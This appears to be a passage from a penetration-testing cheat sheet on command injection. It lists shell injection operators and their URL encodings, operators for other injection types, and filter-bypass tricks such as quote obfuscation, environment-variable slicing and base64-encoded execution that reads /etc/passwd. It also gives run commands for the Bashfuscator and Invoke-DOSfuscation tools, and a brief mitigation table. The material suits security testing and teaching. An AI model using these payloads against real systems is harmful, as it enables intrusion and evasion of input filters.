3. Command Injection
| Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
|---|---|---|---|
| Semicolon | ; |
%3b |
Executes both commands sequentially |
| New Line | \n |
%0a |
Executes both commands sequentially |
| Background | & |
%26 |
Executes both commands; second may run first |
| Pipe | | |
%7c |
Pipes output of first command to second |
| AND | && |
%26%26 |
Executes second command if first succeeds |
| OR | | |
%7c%7c |
Executes second command if first fails |
| Sub-Shell | `` | %60%60 |
Executes command within a sub-shell (Linux) |
| Sub-Shell | $() |
%24%28%29 |
Executes command within a sub-shell (Linux) |
| Tab | %09 |
||
Brace e.g. {ls,-la} |
| Injection Type | Operators |
|---|---|
| SQL Injection | ' , ; -- /* */ |
| Command Injection | ; && |
| LDAP Injection | * ( ) & |
| XPath Injection | ' or and not substring concat count |
| OS Command Injection | ; & |
| Code Injection | ' ; -- /* */ $() ${} #{} %{} ^ |
| Directory Traversal/File Path Traversal | ../ ..\ %00 |
| Object Injection | ; & |
| XQuery Injection | ' ; -- /* */ |
| Shellcode Injection | \x \u %u %n |
| Header Injection | \n \r\n \t %0d %0a %09 |
| Bypassing Blacklisted Characters | Linux | Windows |
|---|---|---|
| Obfuscation | w'h'o'am'i, who$@ami |
who^ami |
| Reverse Execution | (tr "[A-Z]" "[a-z]"<<<"WhOaMi") |
"whoami"[-1..-6] -join '' |
<br>printenv<br>$ echo ${PATH}<br>/usr/local/bin:/usr/bin:/bin:/usr/games<br><br>$ echo ${PATH:0:1}<br>/<br>c<br>$ echo ${LS_COLORS:10:1}<br><br>;<br> |
<br>Get-ChildItem Env<br>echo %HOMEPATH:~6,-11%<br><br>$env:HOMEPATH[0]<br><br>$env:PROGRAMFILES[10]<br> |
|
| Encoding | <br>$ echo -n 'cat /etc/passwd | grep 33' | base64<br>Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==<br>$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)<br>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br> |
<br>> [Convert]::ToBase64StringUnicode.GetBytes('whoami'))<br>dwBoAG8AYQBtAGkA<br><br>$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64<br>dwBoAG8AYQBtAGkA<br><br>> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA'))"<br>21y4d<br> |
| Mitigation Strategies | Implementation |
|---|---|
| Input Validation | Allow only expected characters and formats |
| Use Safe APIs | Avoid system(), use parameterized queries |
| Least Privilege | Ensure applications run with minimal necessary privileges |
| Regular Security Testing | Conduct automated scanning and manual penetration testing |
| Stay Updated | Keep software and dependencies up to date |
| Evasion Tools | Linux | Windows |
|---|---|---|
| Tool | Bashfuscator | Invoke-DOSfuscation |
| Clone Command | git clone https://github.com/Bashfuscator/Bashfuscator |
git clone https://github.com/danielbohannon/Invoke-DOSfuscation |
| Execution | ./bashfuscator -c 'cat /etc/passwd' |
Import-Module .\Invoke-DOSfuscation.psd1 |